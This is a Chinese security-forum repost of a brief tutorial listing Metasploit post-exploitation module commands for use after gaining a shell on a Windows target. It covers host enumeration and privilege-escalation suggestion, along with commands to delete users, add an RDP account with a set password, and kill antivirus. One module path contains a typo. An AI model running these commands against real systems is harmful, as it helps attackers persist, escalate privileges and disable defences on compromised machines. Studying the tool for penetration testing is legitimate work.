安全矩阵

 找回密码
 立即注册
搜索
查看: 2901|回复: 0

Metasploit -- 后渗透模块(POST)

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-2 22:26:07 | 显示全部楼层 |阅读模式
原文链接:Metasploit -- 后渗透模块(POST)

给时间一点时间,让过去过去,让开始开始。。。

----  网易云热评
作用:获取目标主机后shell后,继续信息收集,提权
1、获取目标分区情况
run post/windows/gather/forensics/enum_drives

2、检测是否是虚拟主机
run post/windows/gather/checkvm

3、获取当前安装的应用程序
run post/windows/gather/enum_applications

4、获取用户登录信息
run post/windows/gather/enum_logged_on_users

5、对目标进行漏洞扫描
run post/multi/recon/local_exploit_suggester

6、收集系统环境信息
run post/multi/gather/env

7、查看开启的服务
run post/windows/gather/enum_services

8、查看目标主机最近的操作
run post/windows/gather/dumplinks


9、其他操作
删除用户
run post/wndows/manage/delete_user username=aiyou
添加账户
run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou
关闭杀软
windows/manage/killav



禁止非法,后果自负
欢迎关注公众号:web安全工具库


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 22:54 , Processed in 0.013984 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表